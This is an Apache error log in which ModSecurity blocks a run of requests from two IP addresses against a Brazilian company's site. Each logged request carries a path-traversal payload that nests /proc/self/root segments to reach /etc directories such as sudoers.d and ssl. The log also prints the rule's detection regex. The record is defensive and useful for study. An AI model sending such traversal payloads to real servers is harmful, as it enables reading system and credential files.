[Tue Mar 17 09:31:42.869465 2026] [:error] [pid 1016:tid 140411716749056] [client 74.7.241.46:35418] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJrpqmL8PQht4WJFlH5QAAAUM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:31:44.133604 2026] [:error] [pid 2325:tid 140411590858496] [client 74.7.243.203:51092] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJsO82sZHvlq4xgHrCcgAAApI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:31:44.186484 2026] [:error] [pid 2325:tid 140411733534464] [client 74.7.241.46:35428] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJsO82sZHvlq4xgHrCcwAAAoE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:31:45.572236 2026] [:error] [pid 11469:tid 140411582465792] [client 74.7.241.46:35432] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJsZDEJR9VXonE_-1PAQAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:31:46.591329 2026] [:error] [pid 1731:tid 140411733534464] [client 74.7.243.203:51104] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJsgb2qCuy5irgBMjJMwAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:31:46.900393 2026] [:error] [pid 2553:tid 140411674785536] [client 74.7.241.46:35444] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJsv0Bec_B9OkZP_i9FwAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:31:47.919328 2026] [:error] [pid 7437:tid 140411666392832] [client 74.7.243.203:51110] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJsweiSKl8TjouI-YCRQAAA8k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:31:48.275881 2026] [:error] [pid 1731:tid 140411540502272] [client 74.7.241.46:40808] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJtAb2qCuy5irgBMjJNAAAAFg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:31:49.498718 2026] [:error] [pid 11469:tid 140411699963648] [client 74.7.243.203:51122] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJtZDEJR9VXonE_-1PBQAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:31:49.627712 2026] [:error] [pid 11293:tid 140411574073088] [client 74.7.241.46:40818] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJtdCmCSWTlPouqorL_QAAANQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:31:50.803018 2026] [:error] [pid 2473:tid 140411683178240] [client 74.7.243.203:39590] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJtqBJNF7axNlVR0X8egAAAAc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:31:50.909819 2026] [:error] [pid 11293:tid 140411557287680] [client 74.7.241.46:40834] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJttCmCSWTlPouqorMAAAAANY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:31:52.270913 2026] [:error] [pid 7437:tid 140411716749056] [client 74.7.241.46:40838] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJuAeiSKl8TjouI-YCRwAAA8M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:31:53.176940 2026] [:error] [pid 1210:tid 140411565680384] [client 74.7.243.203:39596] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJuVKJy4A1bGlmj9BVuAAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:31:54.505431 2026] [:error] [pid 11293:tid 140411666392832] [client 74.7.243.203:39606] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJutCmCSWTlPouqorMBQAAAMk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:31:55.801597 2026] [:error] [pid 2473:tid 140411632822016] [client 74.7.243.203:39608] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJu6BJNF7axNlVR0X8fQAAAA0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:31:55.886546 2026] [:error] [pid 11293:tid 140411616036608] [client 74.7.241.46:40852] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJu9CmCSWTlPouqorMBwAAAM8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:31:57.096991 2026] [:error] [pid 11293:tid 140411649607424] [client 74.7.243.203:39612] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJvdCmCSWTlPouqorMCAAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:31:57.177031 2026] [:error] [pid 11293:tid 140411725141760] [client 74.7.241.46:40864] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJvdCmCSWTlPouqorMCQAAAMI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:31:58.339720 2026] [:error] [pid 2325:tid 140411557287680] [client 74.7.241.46:47254] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJvu82sZHvlq4xgHrCdwAAApY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:31:58.427023 2026] [:error] [pid 2473:tid 140411699963648] [client 74.7.243.203:39620] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJvqBJNF7axNlVR0X8fwAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:31:59.608909 2026] [:error] [pid 1210:tid 140411674785536] [client 74.7.241.46:47264] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJv1KJy4A1bGlmj9BVugAAAkg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
